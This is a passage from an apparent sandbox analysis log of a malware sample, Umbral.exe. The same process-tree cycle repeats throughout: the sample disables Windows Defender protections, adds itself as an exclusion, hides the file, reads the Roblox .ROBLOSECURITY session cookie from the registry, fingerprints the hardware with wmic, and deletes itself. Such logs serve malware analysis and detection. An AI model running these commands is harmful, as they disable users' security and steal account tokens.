        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        49⤵
        
        PID:2456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        
        PID:368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        
        PID:4916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        49⤵
        
        PID:4496
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        49⤵
        
        PID:4868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:4564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        49⤵
        
        PID:2300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        49⤵
        Detects videocard installed
        
        PID:4784
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        49⤵
        
        PID:3172
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        50⤵
        Runs ping.exe
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        47⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        Drops file in Drivers directory
        
        PID:3572
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        46⤵
        
        PID:1500
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        Views/modifies file attributes
        
        PID:2436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        46⤵
        
        PID:4280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        46⤵
        
        PID:1904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:4992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        46⤵
        
        PID:4532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        46⤵
        
        PID:4964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        46⤵
        
        PID:4476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        46⤵
        
        PID:2188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        46⤵
        
        PID:432
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        46⤵
        Detects videocard installed
        
        PID:628
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        46⤵
        
        PID:2372
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        47⤵
        Runs ping.exe
        
        PID:808
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        Drops file in Drivers directory
        
        PID:4316
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:1500
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        Views/modifies file attributes
        
        PID:1028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        44⤵
        
        PID:1472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:3060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:2172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        44⤵
        
        PID:4256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:2616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        44⤵
        
        PID:4520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:3092
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:4868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        44⤵
        
        PID:1484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        44⤵
        Detects videocard installed
        
        PID:4668
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        44⤵
        
        PID:4308
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        45⤵
        Runs ping.exe
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        41⤵
        Drops file in Drivers directory
        
        PID:436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        42⤵
        
        PID:4908
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        Views/modifies file attributes
        
        PID:4496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        42⤵
        
        PID:876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        
        PID:2956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        
        PID:1608
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        42⤵
        
        PID:2620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        42⤵
        
        PID:4904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        42⤵
        
        PID:4256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        42⤵
        
        PID:2616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        42⤵
        Detects videocard installed
        
        PID:3092
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        42⤵
        
        PID:3920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        43⤵
        
        PID:2732
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        43⤵
        Runs ping.exe
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        Drops file in Drivers directory
        
        PID:4200
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:2148
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        Views/modifies file attributes
        
        PID:1756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        40⤵
        
        PID:4140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:3228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:3356
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        40⤵
        
        PID:644
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        40⤵
        
        PID:3588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:3144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        40⤵
        
        PID:1480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        40⤵
        Detects videocard installed
        
        PID:4656
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        40⤵
        
        PID:516
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        41⤵
        Runs ping.exe
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        Drops file in Drivers directory
        
        PID:4888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:648
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        Views/modifies file attributes
        
        PID:4144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        38⤵
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:4532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        38⤵
        
        PID:3532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        38⤵
        
        PID:4768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:4516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        38⤵
        
        PID:832
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        38⤵
        Detects videocard installed
        
        PID:2856
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        38⤵
        
        PID:4100
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        39⤵
        Runs ping.exe
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        Drops file in Drivers directory
        
        PID:4840
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:1084
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        Views/modifies file attributes
        
        PID:2360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        35⤵
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:1000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:2724
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        35⤵
        
        PID:3176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        35⤵
        
        PID:4412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        35⤵
        
        PID:4496
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        35⤵
        Detects videocard installed
        
        PID:4616
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        35⤵
        
        PID:3968
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        36⤵
        Runs ping.exe
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        Executes dropped EXE
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:4016
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        Views/modifies file attributes
        
        PID:2728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        33⤵
        
        PID:3968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:1192
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        33⤵
        
        PID:452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        33⤵
        
        PID:3520
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        33⤵
        
        PID:968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        33⤵
        Detects videocard installed
        
        PID:768
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        33⤵
        
        PID:1872
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        34⤵
        Runs ping.exe
        
        PID:684
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        Executes dropped EXE
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        Executes dropped EXE
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1520
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:1780
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        Views/modifies file attributes
        
        PID:1904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        30⤵
        
        PID:1268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:2324
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        30⤵
        
        PID:1112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        30⤵
        
        PID:2596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:4344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        30⤵
        
        PID:4532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        30⤵
        Detects videocard installed
        
        PID:3436
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        30⤵
        
        PID:3928
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        31⤵
        Runs ping.exe
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        Executes dropped EXE
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        Executes dropped EXE
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3124
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:1776
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        Views/modifies file attributes
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        27⤵
        
        PID:1504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:3244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:3084
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        27⤵
        
        PID:5056
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        27⤵
        
        PID:1872
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:4520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        27⤵
        
        PID:5012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:688
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        27⤵
        
        PID:4296
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        28⤵
        Runs ping.exe
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        Executes dropped EXE
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
